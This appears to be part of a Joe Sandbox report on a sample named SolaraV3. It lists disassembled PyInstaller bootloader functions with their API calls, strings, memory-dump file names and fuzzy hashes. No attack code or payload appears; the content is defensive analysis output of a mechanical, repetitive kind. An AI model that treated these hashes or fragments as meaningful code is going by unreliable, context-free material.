String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction ID: 5bd0f72d8adc669c3cb0b94db63bc82d810b916f619e63c21d10af3535aa785f
Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
Instruction Fuzzy Hash: 5322B364A0DB0F96FE659B56A86057CA3B0FF18781F545037C81F822A0EF3DB16B9348

Function 00007FF6DC7081D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6DC7086B7,?,?,00000000,00007FF6DC703CBB), ref: 00007FF6DC70822C

Part of subcall function 00007FF6DC702810: MessageBoxW.USER32 ref: 00007FF6DC7028EA

Strings

\, xrefs: 00007FF6DC708261
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6DC70829D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6DC708203
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6DC708240
CreateDirectory, xrefs: 00007FF6DC70837C
%.*s, xrefs: 00007FF6DC70830C
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6DC708373
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6DC7082D9

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction ID: 2eb6479a9e5064bf511a11b16d31ba874cc6cf6a2ae0b124b8b744b0db849820
Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction Fuzzy Hash: 6351D711B2DA4A81FB619B26D8612FEA270EF94780F444537DA4EC26D5EE3DE027D700

Function 00007FF6DC702180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6DC7021AB
SelectObject.GDI32 ref: 00007FF6DC7021F2
DrawTextW.USER32 ref: 00007FF6DC702215
SelectObject.GDI32 ref: 00007FF6DC70222B
ReleaseDC.USER32 ref: 00007FF6DC70223B
MoveWindow.USER32 ref: 00007FF6DC70228B
MoveWindow.USER32 ref: 00007FF6DC7022CB
MoveWindow.USER32 ref: 00007FF6DC70231E
MoveWindow.USER32 ref: 00007FF6DC702366

Strings

P%, xrefs: 00007FF6DC7021FF

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 6bb560890a1063760ff1b2432fb7f93ef47802c76cb82598edb2bfde7034b5c9
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 3351E736608BA186D6349F26E4581BEB7A1F798B61F004126EFDF83694DF3CD056DB10

Function 00007FF6DC7080C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6DC7080FF
GetWindowLongPtrW.USER32 ref: 00007FF6DC70817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF6DC708192
GetLastError.KERNEL32 ref: 00007FF6DC70819C
SetWindowLongPtrW.USER32 ref: 00007FF6DC7081B3

Strings

Needs to remove its temporary files., xrefs: 00007FF6DC708185

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 7c585f7a559c15c08ef608bd35c4c35b0554370b399aff796e7cc0c8dafb2a4d
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 7821A921B08A4AC5E7518B7AE85417DA260FF88BD0F584236DE2EC33D5DE2CD5729301

Function 00007FF6DC716290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7162D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7166C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71695C

Strings

:, xrefs: 00007FF6DC71648C
p, xrefs: 00007FF6DC716385
p, xrefs: 00007FF6DC7163FD
f, xrefs: 00007FF6DC7163F5
-, xrefs: 00007FF6DC716369

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 79a2cfecd9b28d38432b09fcbaf9c1260cb1a056df2b58ef13de02e89872d42e
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 0E12B572E0C24B86FB205E9DD1646BD76A2FB50750F886137E699876C4DF3CE5A2CB00

Function 00007FF6DC710FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC711008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7113D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC71166F

Strings

p, xrefs: 00007FF6DC7110AD
f, xrefs: 00007FF6DC7110A0
f, xrefs: 00007FF6DC711255
f, xrefs: 00007FF6DC71110A
p, xrefs: 00007FF6DC711112

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 2eddba98cd7bd985834afa704490bf71776279aa41a4f794b1605193a7537f9c
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: AC12A661E1C58B87FB205E19E06427D76A5FB40754FD46033D69A8BAC8DF3CE5A2CB10

Function 00007FF6DC701050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6DC7010CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6DC701098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6DC701108
fread, xrefs: 00007FF6DC7011FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6DC7011F6
fseek, xrefs: 00007FF6DC7010D3
malloc, xrefs: 00007FF6DC70110F

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: b26e2704b55541f584d7242c8d80862a6cabd1b7332d96b23be924faef1d69f3
Instruction ID: 128a8c90c54ff631be9942f03b8e5c3482cad9073ef72b4757f9ec0ea8ccb4c3
Opcode Fuzzy Hash: b26e2704b55541f584d7242c8d80862a6cabd1b7332d96b23be924faef1d69f3
Instruction Fuzzy Hash: 4641CE22B0865A86EA14DB17A8106BEA3A5FF44BC4F844433ED4DC778ADE3DE563D340

Function 00007FF6DC701470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6DC7014DE
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6DC70149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6DC701518
fread, xrefs: 00007FF6DC7015E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6DC7015DF
fseek, xrefs: 00007FF6DC7014E5
malloc, xrefs: 00007FF6DC70151F

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: e8620759fa4b547739b0f8e1c557d5449f59716195cde5e5a3d05c06c09f61fe
Instruction ID: b9ba899871d3670b54bf3b53ad20f490e73dd59220c7877a26ded39d0d834774
Opcode Fuzzy Hash: e8620759fa4b547739b0f8e1c557d5449f59716195cde5e5a3d05c06c09f61fe
Instruction Fuzzy Hash: DA41A132B0864A8AEB11DB22D4505BDA3A0FF44794F445533ED4E8BB99DE3DE563D700

Function 00007FF6DC70EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6DC70EA65

Part of subcall function 00007FF6DC70F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6DC70F9FF
Part of subcall function 00007FF6DC70F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6DC70FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6DC70EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6DC70ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6DC70EE98

Strings

csm, xrefs: 00007FF6DC70EAE6
csm, xrefs: 00007FF6DC70EA7F
csm, xrefs: 00007FF6DC70EB60

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: 7d2efa3e56b21f8a086696df1f452fb08cc197e285ca4e21af46f31a94ce5cdf
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: B6D18032A0874986EB20DF26D4413AD77B4FB55798F100136EE8D97B96DF3AE4A2D700

Function 00007FF6DC702C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
MessageBoxW.USER32 ref: 00007FF6DC702D99

Strings

Error, xrefs: 00007FF6DC702D8C
%ls: , xrefs: 00007FF6DC702D22
<FormatMessageW failed.>, xrefs: 00007FF6DC702D70
[PYI-%d:ERROR] , xrefs: 00007FF6DC702CA6

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: cfd60cbe75411257a8d0a185084403d822d742e250b1b9291541c7ddb6f9d44a
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: C831D623708A4546E721AB26B8102AF66A1BF88799F410137EF4ED3B59DF3DD557C700

Function 00007FF6DC70DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD4D
GetLastError.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD85
FreeLibrary.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDFF

Strings

api-ms-, xrefs: 00007FF6DC70DD6D

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: e0a2312b60a5bac6d4238bef9f6bac598989c5c65bdd497a9777e53801983b32
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: D9310521B1A74AD1EE229B03A4116BD63A4FF18BA0F494137ED1E87380DF3DE062D304

Function 00007FF6DC706360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6DC706407
ucrtbase.dll, xrefs: 00007FF6DC7063DD
LoadLibrary, xrefs: 00007FF6DC7064AE
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF6DC706456
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6DC7063C7
Failed to load Python DLL '%ls'., xrefs: 00007FF6DC7064A7

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: 3059dc2f01a71683287ed9c1200bdf705e85bf689016b3d0645b35dcdfb4a902
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: 4D418121B18A8F91EA21DB26E4252ED6325FF54340F800133EA5D876D5EF3DE62BD740

Function 00007FF6DC702A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6DC70351A,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC702AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF6DC702B0F
0, xrefs: 00007FF6DC702B16
Warning, xrefs: 00007FF6DC702B1E
WARNING, xrefs: 00007FF6DC702AAF
[PYI-%d:%s] , xrefs: 00007FF6DC702AA8

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 99a65243a18f80446305b0d7d622b58de2353c1983ade51469d38b1ea24c56d3
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: FF21B272A18B8542E7209B55F8517EAA3A4FB883C4F400137FE8D83659DF3CD1568740

Function 00007FF6DC71B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6DC71B15F
FlsGetValue.KERNEL32 ref: 00007FF6DC71B174
FlsSetValue.KERNEL32 ref: 00007FF6DC71B195
FlsSetValue.KERNEL32 ref: 00007FF6DC71B1C2
FlsSetValue.KERNEL32 ref: 00007FF6DC71B1D3
FlsSetValue.KERNEL32 ref: 00007FF6DC71B1E4
SetLastError.KERNEL32 ref: 00007FF6DC71B1FF

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: 5d33a0b0013c490226e7d7751f4eb25a233001fb05fab278941ab6e8e72b7e22
Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: CA219D30F0C64A86FA6963399A7113DA2425F447F0F116736E93EC7AC6DE2CB4639300

Function 00007FF6DC727D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6DC727D9D
GetLastError.KERNEL32 ref: 00007FF6DC727DA9
CloseHandle.KERNEL32 ref: 00007FF6DC727DC1
CreateFileW.KERNEL32 ref: 00007FF6DC727DEC
WriteConsoleW.KERNEL32 ref: 00007FF6DC727E0B

Strings

CONOUT$, xrefs: 00007FF6DC727DCD

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
